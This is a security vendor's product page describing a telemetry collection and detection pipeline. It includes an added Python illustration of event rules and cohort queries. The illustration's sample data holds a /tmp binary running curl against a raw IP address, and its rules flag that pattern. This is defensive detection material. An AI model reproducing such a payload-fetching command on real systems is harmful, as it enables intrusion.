The Uptycs Security Analytics Platform is built for modern defenders who have a charter to close security observability gaps across their cloud-native infrastructure. Most security stacks don’t make it easy to get the answers you need, and lack the transparency required to conduct forensics. But with unified observability across productivity endpoints, server workloads, container runtimes and orchestration systems, cloud providers, SaaS applications, and identity providers, Uptycs empowers security teams with actionable answers across their attack surface to improve enterprise-wide security.
If you’re struggling with questions like, “What containers in my environment are running this known vulnerable package?” or “Where else is this file hash appearing across my Kubernetes Cluster?” or “How many servers have had the password rotated in the last 90 days?”, Uptycs gives you the ability to get all the answers from the same console.
What questions do you have for your environment?
Meet your cloud-native security solution stack. The Uptycs platform is composed of:
The modern defenders' attack surface is different:
To protect the cloud-native attack surface, you must first be able to observe it. Wherever it might be.
Query-based sensors aligned to cloud-native asset classes (hosts, VMs, containers, orchestration systems, cloud providers, SaaS applications, and identity providers) continuously stream telemetry over a TLS connection; the telemetry is then aggregated and analyzed in the Uptycs Security Analytics Platform.
The tool suite behind our telemetry-powered approach consists of:
With the relevant query-based sensors active, the Uptycs Security Analytics Platform immediately begins ingesting and analyzing telemetry, normalized into a tabular format so that you have connected insights across all of your asset classes in the same place.
The Uptycs Security Analytics Platform can be visualized as a data engineering pipeline with three stages:
In the collection phase, telemetry is captured either by an agent deployed to the host (osquery) or through native API integrations (kubequery, cloudquery) and transferred to the Uptycs backend over HTTPS (HTTP over TLS). The telemetry can be bucketed into two broad areas based on the attack surface:
The tabular telemetry can be acted upon both while it’s streaming (for real-time correlation and alerting) and once it's been aggregated and stored (for reporting and ad hoc historical querying).
The aggregation phase is where Uptycs' speed and scale truly shine. Our eXtended Detection Network (XDN) applies scaling techniques such as consistent hashing, on top of HTTP and TLS load balancing, to spread ingestion load reliably across the backend. The Uptycs backend can concurrently ingest a wide variety of structured telemetry from multiple interfaces. For example, a fleet of 100,000 machines, multiple concurrent Kubernetes clusters, and thousands of AWS accounts, each providing configuration, CloudTrail activity, and AWS Flow Logs, can simultaneously connect and transmit telemetry to the Uptycs backend.
The XDN also facilitates cohort analysis. An example: telemetry is in flight from a cohort of 1,000 database servers, and anomalous behavior is identified on one of the machines. The anomalous behavior on that single machine is converted into a real-time query, which is then evaluated against the other 999 machines.
In the analyze phase, Lambda analytics are used to analyze data while it’s in flight for near real-time correlation. While in flight, Uptycs correlates data with a variety of open source threat intel databases and independent research findings from the Uptycs Threat Research Team. Data is partitioned as a function of time and compressed so that the telemetry can be historically analyzed at scale.
This streaming analytics model allows Uptycs to take each row of structured data and correlate it using event and alert rules to generate signals. Billions of pieces of telemetry are narrowed to thousands of signals, and those signals are correlated into tens of detections, making it possible for humans and automation to actually consume the insight and make data-driven decisions during investigations, in forensics efforts, and in evidence retrieval as part of a compliance requirement.
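The narrowing model described above (rows to signals to detections) and the cohort analysis from the aggregation phase, as an added illustration that is not Uptycs code: tabular process rows are evaluated against event rules, per-host signal bursts are escalated to detections, and one detection's file hash is re-run as a query over the rest of the cohort. All rows, rule names and hashes are constructed for this example.

```python
from collections import defaultdict

# Constructed osquery-style process_events rows from a four-host database cohort
# (hashes shortened and invented for this example; not real telemetry).
TELEMETRY = [
    {"host": "db-01", "t": 100, "path": "/usr/bin/postgres", "parent": "systemd", "sha256": "aaa0", "cmdline": "postgres -D /var/lib/pg"},
    {"host": "db-01", "t": 105, "path": "/tmp/.x/kworker", "parent": "bash", "sha256": "bad1", "cmdline": "/tmp/.x/kworker"},
    {"host": "db-01", "t": 106, "path": "/usr/bin/curl", "parent": "/tmp/.x/kworker", "sha256": "ccc0", "cmdline": "curl http://198.51.100.7/p"},
    {"host": "db-02", "t": 100, "path": "/usr/bin/postgres", "parent": "systemd", "sha256": "aaa0", "cmdline": "postgres -D /var/lib/pg"},
    {"host": "db-03", "t": 100, "path": "/usr/bin/postgres", "parent": "systemd", "sha256": "aaa0", "cmdline": "postgres -D /var/lib/pg"},
    {"host": "db-03", "t": 300, "path": "/var/tmp/kworker", "parent": "bash", "sha256": "bad1", "cmdline": "/var/tmp/kworker"},
    {"host": "db-04", "t": 100, "path": "/usr/bin/postgres", "parent": "systemd", "sha256": "aaa0", "cmdline": "postgres -D /var/lib/pg"},
]

# Event rules: one predicate per row. Every hit becomes a signal (hypothetical rule names).
TMP_DIRS = ("/tmp/", "/var/tmp/")
EVENT_RULES = {
    "exec_from_tmp": lambda r: r["path"].startswith(TMP_DIRS),
    "child_of_tmp_binary": lambda r: r["parent"].startswith(TMP_DIRS),
    "curl_to_raw_ip": lambda r: r["path"].endswith("/curl")
        and "://" in r["cmdline"] and r["cmdline"].split("://", 1)[1][:1].isdigit(),
}

def emit_signals(rows):
    """Stage 1: evaluate each streamed row against every event rule."""
    return [{"host": r["host"], "rule": name, "t": r["t"], "row": r}
            for r in rows for name, pred in EVENT_RULES.items() if pred(r)]

def correlate(signals, window=60):
    """Stage 2: a host where two or more distinct rules fire within `window`
    seconds becomes a detection; lone signals stay signals and are not escalated."""
    by_host = defaultdict(list)
    for s in sorted(signals, key=lambda s: s["t"]):
        by_host[s["host"]].append(s)
    detections = []
    for host, sigs in by_host.items():
        for i, first in enumerate(sigs):
            burst = [s for s in sigs[i:] if s["t"] - first["t"] <= window]
            rules = {s["rule"] for s in burst}
            if len(rules) >= 2:
                detections.append({"host": host, "rules": sorted(rules),
                                   "indicators": {s["row"]["sha256"] for s in burst}})
                break
    return detections

def cohort_query(rows, sha256, exclude_host):
    """Stage 3: re-run one detection's indicator as a query over the rest of the cohort
    ("where else does this hash appear?"), the cohort analysis described above."""
    return sorted({r["host"] for r in rows if r["sha256"] == sha256 and r["host"] != exclude_host})
```

With the constructed rows, db-01 produces three signals inside one window and becomes the only detection, while db-03's single signal does not escalate; querying the detection's hash across the cohort still surfaces db-03 as a second host worth triage.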
Insights from the telemetry collected and analyzed across your cloud-native attack surface are presented as dashboards, reports, or alerts that solve for multiple security, IT, and compliance needs.
Using standards-based summarizations and visualizations, the Uptycs Security Analytics Platform helps teams meet proactive audit-and-compliance requirements as well as reactive detection-and-response requirements.
For Detection & Response, Uptycs applies the MITRE ATT&CK framework. For organizations that need to meet baseline Audit & Compliance or domain-specific compliance regulations, Uptycs provides analytics to confirm that the business maintains the right security hygiene and meets the necessary regulatory compliance standards.
Together, these proactive and reactive controls—along with complete transparency into your security analytics—solve for multiple needs: